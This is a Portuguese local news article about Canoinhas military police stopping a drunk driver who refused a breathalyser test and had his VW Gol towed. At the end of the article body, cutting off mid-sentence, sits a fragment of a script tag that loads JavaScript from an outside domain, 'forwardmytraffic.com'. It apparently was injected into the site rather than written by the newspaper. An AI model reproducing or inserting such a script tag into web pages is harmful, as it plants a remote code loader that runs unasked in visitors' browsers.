InícioDestaquePM DE CANOINHAS AUTUA CONDUTOR SOB EFEITO DE ÁLCOOL

PM DE CANOINHAS AUTUA CONDUTOR SOB EFEITO DE ÁLCOOL

Últimas notícias

Primeira poupança do Pé-de-Meia do ensino médio será paga em fevereiro

O ministro da Educação, Camilo Santana, disse, nesta quarta-feira...

Mega-Sena acumula e prêmio vai a R$ 38 milhões

O concurso 2.815 da Mega-Sena não teve acertador nesta terça-feira...

No domingo, 22, por volta das 23h10, equipes da PM de Canoinhas realizavam ações de polícia ostensiva pela área central do município, quando na Vidal Ramos avistou o veiculo VW Gol o qual quase colidiu contra uma motocicleta, em seguida fez a conversão para Rua Eugenio de Souza sem sinalizar e avançou o sinal vermelho do semáforo da Rua Coronel Albuquerque, sendo abordado.

 

Em entrevista com o condutor, este apresentava sinais de embriaguez, como hálito etílico, andar cambaleante e olhos vermelhos.  Para o condutor foi oferecido o teste do Etilometro sendo negado.

 

Então fora lavrado o auto de constatação de sinais de embriaguez e conduzido o homem para as providencias cabíveis. O veiculo VW Gol foi removido ao pátio conveniado, pois não fora apresentado um condutor…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.